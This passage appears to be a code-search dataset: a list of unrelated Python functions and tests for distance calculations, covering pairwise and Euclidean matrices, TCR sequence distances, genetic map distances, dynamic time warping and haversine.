np.vectorize(right_func)(trinary_mat)\n # Count the number of occurrences of this combination of values\n # by doing a matrix multiply\n new_mat = np.matmul(left_mat, right_mat)\n # Multiply by the squared distance between the values\n squared_distance = (left_val - right_val)**2\n new_mat = new_mat*squared_distance\n # Accumulate the result\n result_mat = result_mat + new_mat\n # Convert to dataframe\n result_mat = np.vectorize(lambda v: np.sqrt(v)) (result_mat)\n self.df_distance = pd.DataFrame(result_mat, columns=self.columns,\n index=self.columns)", "def dist_mat(objs: t.Union[t.Sequence[nx.Graph], 
t.Sequence[t.Collection[SeqGene]]], n_jobs: int = 10) -> np.ndarray:\n if isinstance(objs[0], nx.Graph):\n dist = graph_dist\n else:\n dist = seq_dist\n size = len(objs)\n base = np.zeros(shape=(size, size))\n staged_data = []\n for i in range(size):\n for j in range(size):\n if i <= j:\n staged_data.append((i, objs[i], j, objs[j]))\n staged_data = tqdm(\n staged_data,\n desc='Distance matrix')\n\n with Pool(n_jobs) as workers:\n distances = workers.starmap(dist, staged_data)\n for i, j, d in distances:\n base[i][j] = d\n base[j][i] = d\n return base", "def point_distances(src_points, gt_points):\n distances = EuclideanDistances(np.matrix(src_points), np.matrix(gt_points))\n return np.array(distances)", "def nb_tcrdist(seq_vec1, seq_vec2, distance_matrix=tcr_nb_distance_matrix, dist_weight=3, gap_penalty=4, ntrim=3, ctrim=2, fixed_gappos=True):\n q_L = seq_vec1.shape[0]\n s_L = seq_vec2.shape[0]\n if q_L == s_L:\n \"\"\"No gaps: substitution distance\"\"\"\n tmp_dist = 0\n for i in range(ntrim, q_L - ctrim):\n tmp_dist += distance_matrix[seq_vec1[i], seq_vec2[i]]\n return tmp_dist * dist_weight\n\n short_len = min(q_L, s_L)\n len_diff = abs(q_L - s_L)\n if fixed_gappos:\n \"\"\"If we are not aligning, use a fixed gap position relative to the start of the CDR3\n that reflects the typically longer and more variable-length contributions to\n the CDR3 from the J than from the V. For a normal-length\n CDR3 this would be after the Cys+5 position (ie, gappos = 6; align 6 rsds on N-terminal side of CDR3).\n Use an earlier gappos if lenshort is less than 11.\"\"\"\n min_gappos = min(6, 3 + (short_len - 5) // 2)\n max_gappos = min_gappos\n else:\n \"\"\"The CYS and the first G of the GXG are 'aligned' in the beta sheet\n the alignment seems to continue through roughly CYS+4\n ie it's hard to see how we could have an 'insertion' within that region\n gappos=1 would be a insertion after CYS\n gappos=5 would be a insertion after CYS+4 (5 rsds before the gap)\n the full cdr3 ends at the position before the first G\n so gappos of len(shortseq)-1 would be gap right before the 'G'\n shifting this back by 4 would be analogous to what we do on the other strand, ie len(shortseq)-1-4\"\"\"\n min_gappos = 5\n max_gappos = short_len - 1 - 4\n while min_gappos > max_gappos:\n min_gappos -= 1\n max_gappos += 1\n min_dist = -1\n # min_count = -1\n for gappos in range(min_gappos, max_gappos + 1):\n tmp_dist = 0\n # tmp_count = 0\n remainder = short_len - gappos\n for n_i in range(ntrim, gappos):\n \"\"\"n_i refers to position relative to N term\"\"\"\n # print (n_i, shortseq[i], longseq[i], distance_matrix[shortseq[i]+longseq[i]])\n tmp_dist += distance_matrix[seq_vec1[n_i], seq_vec2[n_i]]\n # tmp_count += 1\n #print('sequence_distance_with_gappos1:', gappos, remainder, dist[seq_i])\n for c_i in range(ctrim, remainder):\n \"\"\"c_i refers to position relative to C term, counting upwards from C term\"\"\"\n tmp_dist += distance_matrix[seq_vec1[q_L - 1 - c_i], seq_vec2[s_L - 1 - c_i]]\n # tmp_count += 1\n #print('sequence_distance_with_gappos2:', gappos, remainder, dist[seq_i])\n if tmp_dist < min_dist or min_dist == -1:\n min_dist = tmp_dist\n # min_count = tmp_count\n if min_dist == 0:\n break\n \"\"\"Note that weight_cdr3_region is not applied to the gap penalty\"\"\"\n return min_dist * dist_weight + len_diff * gap_penalty", "def _compute_snp_distances(self, task):\n genetic_map = task[\"genetic_map\"]\n temp = task[\"snps\"]\n\n # merge genetic map for this chrom\n temp = pd.concat([temp, genetic_map], 
ignore_index=False, sort=True)\n\n # sort based on pos\n temp = temp.sort_values(\"pos\")\n\n # fill recombination rates forward\n temp[\"rate\"] = temp[\"rate\"].fillna(method=\"ffill\")\n\n # assume recombination rate of 0 for SNPs upstream of first defined rate\n temp[\"rate\"] = temp[\"rate\"].fillna(0)\n\n # get difference between positions\n pos_diffs = np.ediff1d(temp[\"pos\"])\n\n # compute cMs between each pos based on probabilistic recombination rate\n # https://www.biostars.org/p/123539/\n cMs_match_segment = (temp[\"rate\"] * np.r_[pos_diffs, 0] / 1e6).values\n\n # add back into temp\n temp[\"cMs\"] = np.r_[0, cMs_match_segment][:-1]\n\n temp = temp.reset_index()\n\n # use null `map` values to find locations of SNPs\n snp_indices = temp.loc[temp[\"map\"].isnull()].index\n\n # use SNP indices to determine boundaries over which to sum cMs\n start_snp_ix = snp_indices + 1\n end_snp_ix = np.r_[snp_indices, snp_indices[-1]][1:] + 1\n snp_boundaries = np.c_[start_snp_ix, end_snp_ix]\n\n # sum cMs between SNPs to get total cM distance between SNPs\n # http://stackoverflow.com/a/7471967\n c = np.r_[0, temp[\"cMs\"].cumsum()][snp_boundaries]\n cM_from_prev_snp = c[:, 1] - c[:, 0]\n\n temp = temp.loc[temp[\"map\"].isna()]\n\n # add back into temp\n temp[\"cM_from_prev_snp\"] = np.r_[0, cM_from_prev_snp][:-1]\n\n # restore index\n temp = temp.set_index(\"index\")\n\n return pd.DataFrame(temp[\"cM_from_prev_snp\"])", "def seq_dist(i1: int, s1: t.Collection[SeqGene],\n i2: int, s2: t.Collection[SeqGene]) -> t.Tuple[int, int, float]:\n m1, m2 = map(\n lambda s: dict(chain.from_iterable(\n ((pos, aa) for pos, aa in zip(g.Pos, g.Seq)) for g in s)),\n [s1, s2])\n d = 0.\n for p in set(m1) | set(m2):\n if p in m1 and p in m2 and m1[p] == m2[p]:\n continue\n d += 1\n return i1, i2, d", "def computeCDR3PWDist(seqs, gap_open=3, gap_extend=3, matrix=parasail.blosum62, useIdentity=False):\n cache = CachedNWDistance(seqs, matrix=matrix, gap_open=gap_open, gap_extend=gap_extend, useIdentity=useIdentity)\n\n indices = cache.indices()\n L = indices.shape[0]\n pwdist = np.nan * np.zeros((L, L))\n \n for i, j in itertools.product(range(L), range(L)):\n \n if i <= j:\n d = cache.metric(indices[i], indices[j])\n pwdist[i, j] = d\n pwdist[j, i] = d\n\n pwdist = pd.DataFrame(pwdist, columns=cache.elements, index=cache.elements)\n return pwdist", "def distance_matrix(cities):\n\n return [[city1.distance(city2) for city2 in cities]\n for city1 in cities]", "def get_closeness(pats,seq_dict,isdiagonal=False,log=False):\n similarities= np.zeros((len(pats),len(pats)))\n intersectCount = np.zeros((len(pats),len(pats)))\n for i,patI in enumerate(pats):\n seqsI=list(zip(*seq_dict[patI]))[1]\n for j,patJ in enumerate(pats):\n seqsJ=list(zip(*seq_dict[patJ]))[1]\n if isdiagonal and i!=j: continue\n if j>i: continue\n if i==j and len(seqsI) < clim:\n similarities[i][j]=0\n continue\n keys1=set(list(zip(*seq_dict[pats[i]]))[0])\n keys2=set(list(zip(*seq_dict[pats[j]]))[0])\n intersectCount[i][j] = len(list(keys1 & keys2))\n random_score=get_random_score(seqsI,seqsJ,nsample=10)\n identical_score=get_identical_score(seqsI,seqsJ)\n score=0.0\n norm=0\n if mixvec:\n vecI=_seqs2vec(seqsI)\n vecJ=_seqs2vec(seqsJ)\n score=get_subscore_mixvec(vecI,vecJ)\n else:\n score=get_subscore_pairwise(list(seqsI),list(seqsJ)) \n print \"idscore (max):\", round(identical_score,4), \"randscore (min):\", round(random_score,4), \"score:\", round(score,4)\n if log: similarity = 
-math.log(1-((float(score)-float(random_score))/(float(identical_score)-float(random_score))))\n else: similarity = ((float(score)-float(random_score))/(float(identical_score)-float(random_score)))\n similarities[i][j]= similarity\n similarities[j][i]= similarity\n print patI,patJ,similarity\n dfDists=pd.DataFrame(similarities,columns=pats,index=pats)\n dfCount=pd.DataFrame(intersectCount,columns=pats,index=pats)\n return dfDists, dfCount", "def _data_labels_distance(self, samples, tfidf_dict, distance_metric='cosine'):\n \n def distance_fn(x):\n return sklearn.metrics.pairwise.pairwise_distances(\n x, x[0], metric=distance_metric).ravel() * 100\n\n base_doc_vector = np.fromiter(tfidf_dict.values(),float)\n base_doc_keys = list(tfidf_dict.keys())\n vectors = [base_doc_vector]\n for sample in samples:\n sample_vector = np.zeros(len(base_doc_keys))\n for token in sample.split():\n token_index = base_doc_keys.index(token)\n sample_vector[token_index] = base_doc_vector[token_index]\n vectors.append(sample_vector)\n\n\n distances = distance_fn(sp.sparse.csr_matrix(vectors))\n return np.array(vectors), distances", "def __build_distance_matrix(self):\n for i in range(0, len(self.__corpus)):\n doc_i = self.__corpus[i]\n for j in range(i + 1, len(self.__corpus)):\n doc_j = self.__corpus[j]\n distance = doc_i.calc_distance(doc_j)\n self.__distance_matrix.append(distance)", "def test_sequence_dist_all_metrics(metric):\n unique_seqs = np.array([\"AAA\", \"ARA\", \"AFFFFFA\", \"FAFAFA\", \"FFF\"])\n seqs2 = np.array([\"RRR\", \"FAFA\", \"WWWWWWW\"])\n dist_mat = ir.ir_dist.sequence_dist(unique_seqs, metric=metric, cutoff=8, n_jobs=2)\n assert dist_mat.shape == (5, 5)\n\n dist_mat = ir.ir_dist.sequence_dist(\n unique_seqs, seqs2, metric=metric, cutoff=8, n_jobs=2\n )\n assert dist_mat.shape == (5, 3)", "def get_distance(route, dists):\n cost = 0\n if route[0] != route[-1]:\n route.append(route[0])\n\n for i in range(len(route)-1):\n cost += dists[route[i], route[i+1]]\n # cost += dists[route[-1], route[0]]\n return cost", "def cluster_correlations(corr_mat, indices=None):\n if indices is None:\n X = corr_mat.values\n d = sch.distance.pdist(X)\n L = sch.linkage(d, method='complete')\n indices = sch.fcluster(L, 0.5 * d.max(), 'distance')\n columns = [corr_mat.columns.tolist()[i]\n for i in list((np.argsort(indices)))]\n corr_mat = corr_mat.reindex(columns=columns).reindex(index=columns)\n return corr_mat, indices", "def _derive_euclidean_dm(self, cat_mat, dim):\r\n res_mat = []\r\n\r\n for i in range(dim):\r\n res_mat.append([0 for k in range(dim)])\r\n for j in range(i):\r\n res_mat[i][j] = self._vector_dist(cat_mat[i], cat_mat[j])\r\n res_mat[j][i] = res_mat[i][j]\r\n\r\n return DistanceMatrix(res_mat, self.DistanceMatrices[0].ids)", "def compute_distances(src):\n rr = np.vstack((src[0]['rr'][src[0]['inuse'].astype(np.bool)],\n src[1]['rr'][src[1]['inuse'].astype(np.bool)]))\n return distance.squareform(distance.pdist(rr))", "def _distance(pts: npt.ArrayLike, stacked: bool = True) -> float:\n if np.ma.isMaskedArray(pts):\n pts = pts.data\n if not stacked:\n pts = np.transpose(pts)\n nrow, ncol = pts.shape\n result = np.sqrt(np.sum(pts.T @ pts * np.identity(ncol)) / nrow)\n return result", "def getDist(ind1,ind2,distMat):\n return distMat[ind1,ind2]", "def calculate_pairwise_distances(embeddings, flag_gpu):\r\n\r\n # calculate some useful variables\r\n batch_size = embeddings.size()[0]\r\n\r\n # calculate squared pairwise distances\r\n pairwise_distances = torch.add(\r\n torch.sum(embeddings ** 2, dim = 
1, keepdim=True),\r\n torch.sum(embeddings.t() ** 2, dim = 0, keepdim=True)) - \\\r\n 2.0 * torch.mm(embeddings, embeddings.t())\r\n \r\n # deal with numerical inaccuracies\r\n zero_matrix = torch.zeros_like(pairwise_distances)\r\n if flag_gpu:\r\n zero_matrix = zero_matrix.cuda()\r\n pairwise_distances = torch.max(pairwise_distances, zero_matrix)\r\n\r\n # clear diagonal values\r\n one_matrix = torch.ones_like(pairwise_distances)\r\n if flag_gpu:\r\n one_matrix = one_matrix.cuda()\r\n eye_matrix = torch.eye(batch_size)\r\n if flag_gpu:\r\n eye_matrix = eye_matrix.cuda()\r\n mask_offdiagonal = one_matrix - eye_matrix\r\n pairwise_distances = pairwise_distances * mask_offdiagonal\r\n\r\n return pairwise_distances", "def calc_distances(ftr, prfx=None):\n print(time.asctime(), ' Computing distances')\n start = time.time()\n dst = util.compute_pair_distances(ftr)\n end = time.time()\n print(time.asctime(), ' Done Computing distances in ', end-start, ' seconds', flush=True)\n\n # Only save if requested (this can be a very large file)\n if prfx is not None:\n np.save('mat_' + prfx, dst)\n\n return dst", "def test_matrix_distance(self):\n # note that the score matrix must contain 'diagonal' elements m[i][i]\n # to avoid failure when the sequences match.\n m = {\"U\": {\"U\": 0, \"C\": 1, \"A\": 5}, \"C\": {\"C\": 0, \"A\": 2, \"G\": 4}}\n self.assertEqual(self.RNA(\"UUUCCC\").matrix_distance(\"UCACGG\", m), 14)\n self.assertEqual(self.RNA(\"UUUCCC\").matrix_distance(\"\", m), 0)\n self.assertEqual(self.RNA(\"UUU\").matrix_distance(\"CAC\", m), 7)\n self.assertRaises(KeyError, self.RNA(\"UUU\").matrix_distance, \"CAG\", m)", "def _computeDistances(self) -> None:\n length = len(self.data)\n for i, sequenceOne in enumerate(self.data):\n print(f\"[SeqCluBaselineOffline] Computing distances is at iteration {i} of {length}.\")\n for j, sequenceTwo in enumerate(self.data):\n if i == j:\n self.distances[i][j] = 0\n continue\n distance = self.distanceMeasure.calculateDistance(sequenceOne, sequenceTwo)\n self.distances[i][j] = distance\n self.distances[j][i] = distance", "def dist(a, b, i, j):\n return np.sqrt(sqrSum(a, b, i, j))", "def pairwise_distance_torch(embeddings, device):\n\n # pairwise distance matrix with precise embeddings\n precise_embeddings = embeddings.to(dtype=torch.float32)\n\n c1 = torch.pow(precise_embeddings, 2).sum(axis=-1)\n c2 = torch.pow(precise_embeddings.transpose(0, 1), 2).sum(axis=0)\n c3 = precise_embeddings @ precise_embeddings.transpose(0, 1)\n\n c1 = c1.reshape((c1.shape[0], 1))\n c2 = c2.reshape((1, c2.shape[0]))\n c12 = c1 + c2\n pairwise_distances_squared = c12 - 2.0 * c3\n\n # Deal with numerical inaccuracies. 
Set small negatives to zero.\n pairwise_distances_squared = torch.max(\n pairwise_distances_squared,\n torch.tensor([0.0]).to(device),\n )\n # Get the mask where the zero distances are at.\n error_mask = pairwise_distances_squared.clone()\n error_mask[error_mask > 0.0] = 1.0\n error_mask[error_mask <= 0.0] = 0.0\n\n pairwise_distances = torch.mul(pairwise_distances_squared, error_mask)\n\n # Explicitly set diagonals to zero.\n mask_offdiagonals = (\n torch.ones(\n (\n pairwise_distances.shape[0],\n pairwise_distances.shape[1],\n )\n )\n - torch.diag(torch.ones(pairwise_distances.shape[0]))\n )\n pairwise_distances = torch.mul(\n pairwise_distances.to(device),\n mask_offdiagonals.to(device),\n )\n return pairwise_distances", "def opt_dist_2d(seq, ks):\n # all chars - required 1s - minimum 0 separators\n additional_0s = len(seq) - sum(ks) - (len(ks) - 1)\n return _dp_opt_dist_2d(tuple(seq), ks, 0, 0, additional_0s)", "def compute_distances(self, X):\n #print(X.shape, self.Xtr.shape)\n dists = np.zeros((X.shape[0], self.Xtr.shape[0]))\n for i in range(X.shape[0]):\n X_r = np.tile(X[i], (self.Xtr.shape[0], 1))\n dists[i] = np.sqrt(np.sum(np.square(self.Xtr - X_r), axis = 1))\n #print(dists.shape)\n return dists", "def hit_time(tmat,start_list,targ_list,ntraj = 1000, cutoff=1000):\n \n # get state names\n nstates = tmat.shape[0]\n states = array([ii for ii in range(nstates)])\n \n times = list()\n \n for ii in range(ntraj):\n curr = choice(start_list)\n tm = 0\n while curr not in targ_list:\n weights = copy(tmat[curr, :])\n curr = discrete_dist(states, weights, nn=1)\n tm += 1\n if tm==cutoff:\n tm = nan\n break\n \n times.append(tm)\n\n return array(times)", "def get_distances(self):\n N = len(self.cells) # Number of cells\n distances = np.zeros([N, N]) # distances between cells\n positions = self.position_matrix() # positions of cells \n \n # get distances between cells (exploit symmetry between upper and lower triangular form)\n for i, position in enumerate(positions[:-1, :]): # Iterate matrix except the last one\n directions = positions[i+1:, :] - position # direction from i to j > i\n distances[i, i+1:] = np.linalg.norm(directions, axis=1) # length of directions\n \n return distances + distances.T # Add lower triangle of matrix to upper ", "def all_distances(coords1, coords2):\r\n c1 = np.array(coords1)\r\n c2 = np.array(coords2)\r\n z = (c1[:, None, :] - c2[None, :, :]) ** 2\r\n return np.sum(z, axis=-1) ** 0.5", "def get_dist(ind_id, sim_id):\n x, y = _get_pos(ind_id, sim_id)\n return (x ** 2 + y ** 2) ** 0.5", "def cal_dist(origs,dests):\n\tradius = 6371.009 # km\n\tif origs.ndim:\n\t\tlat1, lon1 = origs\n\t\tlat2, lon2 = dests\n\telse:\n\t\tlat1 = origs[0,:]\n\t\tlon1 = origs[1,:]\n\t\tlat2 = dests[0,:]\n\t\tlon2 = dests[1,:]\n\tdlat = (lat2-lat1) / 180. * np.pi\n\tdlon = (lon2-lon1) / 180. * np.pi\n\ta = np.sin(dlat/2) * np.sin(dlat/2) + np.cos(lat1 / 180. * np.pi) \\\n\t\t* np.cos(lat2 / 180. 
* np.pi) * np.sin(dlon/2) * np.sin(dlon/2)\n\tc = 2 * np.arctan2(np.sqrt(a), np.sqrt(1-a))\n\treturn radius * c", "def distance(self, features, targets):\n cost_matrix = np.zeros((len(targets), len(features)))\n for i, target in enumerate(targets):\n cost_matrix[i, :] = self._metric(self.samples[target], features)\n return cost_matrix", "def distance(self, features, targets):\n cost_matrix = np.zeros((len(targets), len(features)))\n for i, target in enumerate(targets):\n cost_matrix[i, :] = self._metric(self.samples[target], features)\n return cost_matrix", "def nm_dist_mat(self):\n mat = np.zeros([self.N, self.M])\n for n in range(self.N):\n for m in range(self.M):\n mat[n, m] = distance(self.N_coords[n], self.M_coords[m])\n return mat", "def calculate_dist_mat(embeddings: np.ndarray, norm: int) -> np.ndarray:\n kwargs = {'p': norm}\n condensed_dist = pdist(embeddings, metric='minkowski', **kwargs)\n dist_mat = squareform(condensed_dist)\n return dist_mat", "def _pairwise_distance(self, src_embeds, vocab_embeds, squared=False):\n # compute square norm to avoid compute all the directions\n vocab_sq_norm = vocab_embeds.norm(p=2, dim=-1) ** 2\n src_sq_norm = src_embeds.norm(p=2, dim=-1) ** 2\n\n # dot product\n dot_product = self._pairwise_dot_product(src_embeds, vocab_embeds)\n \n # reshape for broadcasting\n vocab_sq_norm = vocab_sq_norm.unsqueeze(0).unsqueeze(0) # 1, 1, vocab size\n src_sq_norm = src_sq_norm.unsqueeze(2) # batch, seq length, 1\n\n # compute squared difference\n sq_norm = vocab_sq_norm + src_sq_norm - 2 * dot_product\n if squared:\n return sq_norm\n else:\n # relu + epsilon for numerical stability\n sq_norm = F.relu(sq_norm) + 1e-20\n \n # take the square root\n return sq_norm.sqrt()", "def DistanceToIdx(A, B, idx):\n C= A[idx]\n return np.sqrt(np.sum(np.square(C-B),axis=1,keepdims=True))", "def manhattan_dist(idx, pos, n):\n\n row_dist = abs(pos // n - idx // n)\n col_dist = abs(pos % n - idx % n)\n return row_dist + col_dist", "def _get_distance_by_span(matched_positions, forms):\n if len(set(forms[matched_positions])) < 2:\n return 0\n if len(matched_positions) == 2:\n return _get_trivial_distance(matched_positions)\n start_pos = np.min(matched_positions)\n end_pos = np.max(matched_positions)\n if start_pos != end_pos:\n return np.abs(end_pos - start_pos) + 1\n return 0", "def distance_matrix (sim,polymer_text,teq,tsample,threshold=2.5) :\n u = sim.u\n polymer = u.select_atoms (polymer_text)\n N = polymer.n_atoms\n nslice = mbt.traj_nslice (u,teq,tsample)\n d = np.zeros((N,N))\n for i,ts in enumerate(u.trajectory[teq::tsample]) :\n this_d = distance_array(polymer.positions,\n polymer.positions,\n box=ts.dimensions)\n d = mbt.new_average(i,d,this_d)\n return d", "def _distanceToCluster(self, prototypeIndices: ndarray, sequenceIdx: int) -> float:\n return np.sum(self.distances[sequenceIdx][prototypeIndices])", "def get_pca_distances(components_df):\n d = pd.DataFrame()\n for name_i, srs_i in components_df.T.iteritems():\n \n for name_j, srs_j in components_df.T.iteritems():\n d.loc[name_i,name_j] = np.linalg.norm(srs_i-srs_j)\n return d", "def compute_distance(traj1, traj2, matched_pos):\n distance = np.zeros((len(matched_pos),), dtype=float)\n for i in range(len(matched_pos)):\n if matched_pos[i] == -1:\n continue\n else:\n iou = bbox_overlap(traj1[i, 2:6], traj2[matched_pos[i], 2:6])\n distance[i] = iou\n return distance", "def pairwise_squared_distances(data):\n n = data.shape[0]\n distances = np.zeros((n,n))\n for i in range(n):\n for j in range(i+1,n):\n d = 
data[i,:]-data[j,:]\n distances[i,j] = d@d\n distances[j,i] = distances[i,j]\n\n return distances", "def get_adjacent_distances(dist_matrix_header,\r\n dist_matrix,\r\n sample_ids,\r\n strict=False):\r\n filtered_idx = []\r\n filtered_sids = []\r\n for sid in sample_ids:\r\n try:\r\n idx = dist_matrix_header.index(sid)\r\n except ValueError:\r\n if strict:\r\n raise ValueError(\r\n \"Sample ID (%s) is not present in distance matrix\" %\r\n sid)\r\n else:\r\n pass\r\n else:\r\n filtered_idx.append(idx)\r\n filtered_sids.append(sid)\r\n\r\n if len(filtered_idx) < 2:\r\n raise ValueError(\"At least two of your sample_ids must be present in the\"\r\n \" distance matrix. %d are present.\" % len(filtered_idx))\r\n\r\n distance_results = []\r\n header_results = []\r\n for i in range(len(filtered_idx) - 1):\r\n distance_results.append(\r\n dist_matrix[filtered_idx[i]][filtered_idx[i + 1]])\r\n header_results.append(\r\n (filtered_sids[i], filtered_sids[i + 1]))\r\n return distance_results, header_results", "def distance_matrix_squared(crd1, crd2, dim=2):\n crd1 = ensure_traj(crd1)\n crd2 = ensure_traj(crd2)\n n = int(np.shape(crd1)[1] / dim)\n\n crd1_components = [\n np.tile(np.expand_dims(crd1[:, i::dim], 2), (1, 1, n)) for i in range(dim)\n ]\n crd2_components = [\n np.tile(np.expand_dims(crd2[:, i::dim], 2), (1, 1, n)) for i in range(dim)\n ]\n D2_components = [\n (crd1_components[i] - np.transpose(crd2_components[i], axes=(0, 2, 1))) ** 2\n for i in range(dim)\n ]\n D2 = np.sum(D2_components, axis=0)\n return D2", "def distance_between_gt_pred(gt_list_rad, pred_list_rad):\n\n gt_len, pred_len = gt_list_rad.shape[0], pred_list_rad.shape[0]\n ind_pairs = np.array([[x, y] for y in range(pred_len) for x in range(gt_len)])\n cost_mat = np.zeros((gt_len, pred_len))\n\n # Slow implementation\n # cost_mat = np.zeros((gt_len, pred_len))\n # for gt_cnt, gt in enumerate(gt_list_rad):\n # for pred_cnt, pred in enumerate(pred_list_rad):\n # cost_mat[gt_cnt, pred_cnt] = distance_between_spherical_coordinates_rad(gt, pred)\n\n # Fast implementation\n if gt_len and pred_len:\n az1, ele1, az2, ele2 = gt_list_rad[ind_pairs[:, 0], 0], gt_list_rad[ind_pairs[:, 0], 1], \\\n pred_list_rad[ind_pairs[:, 1], 0], pred_list_rad[ind_pairs[:, 1], 1]\n cost_mat[ind_pairs[:, 0], ind_pairs[:, 1]] = distance_between_spherical_coordinates_rad(az1, ele1, az2, ele2)\n\n row_ind, col_ind = linear_sum_assignment(cost_mat)\n cost = cost_mat[row_ind, col_ind].sum()\n return cost", "def seqmat2align(smat,index=None):\n if index is None:\n index = np.arange(smat.shape[0])\n return pd.Series([''.join(smat[seqi,:].astype(str)) for seqi in np.arange(smat.shape[0])], name='seq', index=index)", "def test_sum_of_distances(self):\n N = 10\n centers = [[0, 0], [1, 0], [0.5, np.sqrt(0.75)]]\n cluster_std = [0.3, 0.3, 0.3]\n n_samples = int(0.75 * N)\n data, labels_true = \\\n sklearn.datasets.make_blobs(n_samples=n_samples,\n centers=centers,\n cluster_std=cluster_std)\n centers = [[0.5, np.sqrt(0.75)]]\n cluster_std = [0.3]\n extra, labels_true = \\\n sklearn.datasets.make_blobs(n_samples=int(0.25 * N),\n centers=centers,\n cluster_std=cluster_std)\n X = np.concatenate((data, extra), axis=0)\n N = X.shape[0]\n\n # Pick some random floats for the counts/weights:\n counts = np.random.random_sample((N,)) * 10\n\n # SciPy:\n Y = pdist(X, metric=cdist)\n weights = [counts[i] * counts[j]\n for i in xrange(N - 1) for j in xrange(i + 1, N)]\n scipy_sum = np.sum(weights * Y)\n N = counts.sum()\n N_unique_pairs = N * (N - 1.0) / 2.0\n scipy_mean = 
scipy_sum / N_unique_pairs\n\n # C & Cython:\n c_mean = c_mean_dist(X, counts)\n\n # There is minor rounding error, but check for equality:\n self.assertTrue(np.isclose(c_mean, scipy_mean))\n # Even though above is comparing the means, it is actually checking the\n # sums are correct as the means are calculated in the same way, i.e.,\n # by dividing by the same number, N_unique_pairs.", "def pairwise_cosine(mat):\n def cosine_similarity(a, b):\n return (a * b).sum() / (np.linalg.norm(a) * np.linalg.norm(b))\n\n n = len(mat)\n dist_mat = np.zeros((n, n))\n for i in range(n):\n for j in range(i + 1, n):\n dist = cosine_similarity(mat[i], mat[j])\n dist_mat[i, j] = dist\n dist_mat[j, i] = dist\n\n dist_mat[np.isnan(dist_mat)] = 0\n\n return dist_mat", "def getDistanceMatrix(self, alignedSequences):\n\t\tif not alignedSequences:\n\t\t\traise ValueError(\"alignedSequences must not be empty\")\n\t\tdominantAlignedSequence = alignedSequences[0]\n\t\tsubdominantAlignedSequences = alignedSequences[1:]\n\t\tdistanceMatrix = []\n\t\tfor seq in subdominantAlignedSequences:\n\t\t\tdistanceMatrix.append(len(seq) - self._getNumberOfSpaces(seq) - self._getNumberOfAlignedNucleotides(dominantAlignedSequence, seq))\n\t\treturn distanceMatrix", "def get_generalized_targets_distances(generalized_targets, board):\n representative = generalized_targets[0]\n sm = 0\n for i in range(1, len(generalized_targets)):\n cur_gen_target = generalized_targets[i]\n sm += representative.get_distance(board, cur_gen_target)\n return sm", "def pairwise_distance(M, d, axis=0):\n\n return squareform(pdist(M if axis==0 else M.T, d))", "def _compute_distances(self, atoms: List[CellAtom]):\n muon = self._cell_atoms[self._muon_index]\n\n for atom in atoms:\n atom.distance_from_muon = np.linalg.norm(muon.position - atom.position)", "def DTWDistance(s1, s2):\n len_s1 = len(s1)\n len_s2 = len(s2)\n\n _dtw_mat = np.empty([len_s1, len_s2])\n _dtw_mat[0, 0] = abs(s1[0] - s2[0])\n\n # two special cases : filling first row and columns\n\n for j in range(1, len_s2):\n dist = abs(s1[0] - s2[j])\n _dtw_mat[0, j] = dist + _dtw_mat[0, j - 1]\n\n for i in range(1, len_s1):\n dist = abs(s1[i] - s2[0])\n _dtw_mat[i, 0] = dist + _dtw_mat[i - 1, 0]\n\n #  filling the matrix\n for i in range(1, len_s1):\n for j in range(1, len_s2):\n dist = abs(s1[i] - s2[j])\n _dtw_mat[(i, j)] = dist + min(\n _dtw_mat[i - 1, j], _dtw_mat[i, j - 1], _dtw_mat[i - 1, j - 1]\n )\n\n return _dtw_mat[len_s1 - 1, len_s2 - 1]", "def pairwise(self, arr_x, mat_y):\n n, h = mat_y.shape\n x = np.tile(arr_x, (n, 1)) # become nxh\n x_big = x >= mat_y\n difference = x-mat_y\n big_sum = (x_big * difference).sum(axis=1) # n\n small_sum = ((1-x_big) * (-difference)).sum(axis=1)\n sum_ = (big_sum ** self.p + small_sum ** self.p)\n dist = sum_ ** (1/self.p)\n\n if self.normalize:\n stack = np.stack((x, mat_y, difference), 0)\n stack = np.abs(stack)\n m = stack.max(0).sum(-1)\n dist /= m\n return dist", "def test_distance_indices(self):\n s1 = self.RNA(\"AUGC\")\n s2 = self.RNA(\"AAGC\")\n\n def f(x, y):\n if x == 2 or y == 2:\n return 10\n return 0\n\n self.assertEqual(s1.distance(s2, f, use_indices=True), 20)", "def compute_distances(self):\n if self.df is None:\n return\n\n self.origdist = []\n self.transdist = []\n for i in range(len(self.df)):\n for j in range(i+1, len(self.df)):\n self.origdist.append(distance(self.df['LPsol'].iloc[i], self.df['LPsol'].iloc[j]))\n self.transdist.append(distance(self.df[['x', 'y']].iloc[i], self.df[['x', 'y']].iloc[j]))", "def dist_chord(datamtx, 
strict=True):\n if strict:\n if not all(isfinite(datamtx)):\n raise ValueError(\"non finite number in input matrix\")\n if rank(datamtx) != 2:\n raise ValueError(\"input matrix not 2D\")\n numrows, numcols = shape(datamtx)\n else:\n try:\n numrows, numcols = shape(datamtx)\n except ValueError:\n return zeros((0,0),'d')\n\n if numrows == 0 or numcols == 0:\n return zeros((0,0),'d')\n dists = zeros((numrows,numrows),'d')\n for i in range(numrows):\n r1 = datamtx[i] # cache here\n r1norm = norm(r1)\n for j in range(i):\n r2 = datamtx[j]\n r2norm = norm(r2)\n if r1norm == 0.0 or r2norm == 0.0:\n if r1norm == 0.0 and r2norm == 0.0:\n dist = 0.0\n else: dist = 1.0\n else:\n dist = norm(r1/r1norm - r2/r2norm)\n dists[i,j] = dists[j,i] = dist\n\n return dists", "def calc_distance(\n target_batch_keys, target_keys_pred, batch_assignments_gt, src_key_num_gt\n):\n batch_keys_gt = torch.bmm(batch_assignments_gt, target_batch_keys[:, :, :2])\n err = distance(target_keys_pred, batch_keys_gt, src_key_num_gt)\n return err", "def clustal_omega_distance_matrix(seqrecs, **kwargs):\n\n def commandline(ft, **kwargs):\n with tempfile.NamedTemporaryFile(delete=False, mode=\"w\") as ft_out:\n cline = ClustalOmegaCommandline(\n \"clustalo\",\n infile=ft.name,\n force=True,\n distmat_out=ft_out.name,\n distmat_full=True,\n distmat_full_iter=True,\n )\n stdout, stderr = cline()\n df = pd.read_csv(ft_out.name, delim_whitespace=True, skiprows=1, header=None, index_col=0)\n df.index.name = \"seqid\"\n return df\n\n return _generic_aligner_commandline_file(commandline, seqrecs, **kwargs)", "def calc_dist_matrix(self,verbose=False):\n\n print(\"Calculating distance matrix.\"); sys.stdout.flush()\n\n nrow = self.data_vector.shape[0]\n self.dist_matrix = np.zeros((nrow, nrow),dtype=float)\n for i in range(nrow):\n if verbose:\n if i % 1000 == 0:\n print(\"Row\",i,\"of\",nrow)\n sys.stdout.flush()\n\n for 